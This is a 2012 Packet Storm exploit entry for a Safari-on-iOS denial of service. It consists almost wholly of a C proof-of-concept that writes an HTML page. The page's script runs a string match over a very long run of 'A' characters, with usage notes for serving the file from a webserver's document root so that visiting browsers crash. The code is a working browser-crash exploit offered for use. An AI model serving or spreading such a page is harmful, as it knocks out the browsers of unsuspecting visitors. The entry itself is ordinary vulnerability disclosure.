Safari On iOS Denial Of Service

2012-06-08T00:00:00
ID PACKETSTORM:113448
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2012-06-08T00:00:00

Description

                                        
                                            `/*PoC for Safari crash discovered by  
Alberto Ortega @a0rtega, alberto[@]pentbox[.]net  
  
http://www.livehacking.com/category/vulnerability/apple-vulnerability/  
This PoC written by  
Larry W. Cashdollar http://vapid.dhs.org @lcashdol  
  
This PoC creates an html file to be served out by a normal webserver.   
It seems the browsers begin to crash when the output  
size is 800000+.  
usage: ./safari_crash 800000 /var/www/html/crash.html  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
  
int  
main (int argc, char *argv[])  
{  
  
int x = 0;  
FILE *fout;  
char *payload = "<html>\n<head><title>Crash Safari PoC";  
char *payload2="</title></head>\n<script  
type=\"text/javascript\">\nvar s = \"PoC\";\ns.match(\"\0";  
char *payload3 = "\");\n</script>\n</html>\0";  
  
if (argc < 3)  
{  
printf  
("Safari Crash PoC\nPlease supply buffer length and filename.\nEx  
:%s 800000 crash.html\n",  
argv[0]);  
exit (0);  
}  
fout = fopen (argv[2], "w");  
  
fprintf (fout, "%s", payload);  
fprintf (fout, "Size : %s x A",argv[1]);  
fprintf (fout,"%s",payload2);  
while (x < atoi (argv[1]))  
{  
fprintf (fout, "A");  
x++;  
}  
  
fprintf (fout, "%s", payload3);  
fclose (fout);  
  
return (0);  
}  
`